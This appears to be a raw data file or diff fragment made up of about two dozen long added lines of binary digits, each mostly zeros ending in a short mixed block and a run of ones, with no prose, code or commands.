+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000001000100010101011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101100011101110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110101100111101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111001101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000110100110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000100000111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 